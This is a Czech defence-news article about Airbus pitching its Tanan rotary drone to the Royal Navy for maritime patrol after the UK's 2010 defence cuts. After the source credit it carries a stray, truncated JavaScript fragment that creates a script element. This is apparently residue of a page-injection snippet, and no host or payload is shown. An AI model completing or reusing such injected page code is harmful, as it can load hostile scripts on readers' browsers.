UAV | UAS

Airbus by rád předvedl Tanan UAS Královskému námořnictvu

Airbus Defence & Space (dříve Cassidian) pracuje na certifikaci technologického demonstrátoru svého rotorového bezpilotního prostředku Tanan, o kterém by mohlo uvažovat britské Royal Navy pro námořní hlídkovou činnost.

Očekává se, že Ministerstvo obrany oznámí požadavky na potřeby zajištění námořní hlídkové činnosti v květnu, po zveřejnění své Strategic Defence and Security Review. Ta představuje zhodnocení stavu obranných sil a koncepce jejich dalšího rozvoje a předurčuje směr obranné politiky Velké Británie. Vychází nepravidelně a plní stejný účel, jako naše Bílá kniha o obraně.

Zpráva je s napětím očekávána, protože předcházející z roku 2010 řádně očesala akceschopnost všech složek, ale díky ceně „za kus“ dopadla tvrdě především na Královské námořnictvo. Britská vláda se rozhodla stůj co stůj zacelit schodek 39 miliard liber v obranném plánování a řada projektů byla zrušena, nabrala zpoždění nebo omezena. Drasticky byl snížen i počet aktivních jednotek. Royal Navy je tak nyní například bez letadlové lodi – plánované HMS Queen Elizabeth a Prince of Wales se mají do služby dostat v letech 2016 a 2018, přičemž ale druhá loď bude pouze ve stavu zvýšené připravenosti, což je eufemismus pro přivázání v přístavu a starání se o nátěr. V případě nutnosti pak může vyplout a fungovat jako podpůrné letiště.

Z hlediska vzdušného hlídkování se tedy spekuluje, zda britské námořnictvo půjde tradiční cestou pilotovaných letounů, bezpilotních prostředků nebo kombinací obojího. V roce 2010 totiž byly ze služby vyřazeny námořní hlídkové Nimrod MR2 a projekt modernizace MRA4 byl zrušen. Británie tak například provádí pátrací operace s využitím C-130 Hercules a již pět let je pro srandu králíkům. Minulý rok na „chvilku“ ztratila ruský torpédoborec, o neschopnosti vyhledat ponorky ani nemluvě. Sázka na to, že vše zvládnou fregaty Type 23 a vrtulníky Merlin jaksi nevychází.

Royal Navy by proto rádo mělo prostředky pro vzdušný průzkum přímo na lodích, což nahrává kolmo startujícím strojům, které mohou simulovat chování protiponorkových vrtulníků a jejich nasazení i na starší plavidla nevyžaduje velké modifikace.

zdroj: Flightglobalvar d=document;var s=d.createElement(‚script‘);

Předchozí článek

BAE Systems dodá "šílené" drony pro P8-A Poseidon

Další článek

Webový nástroj pro návrh konceptů Mach-Up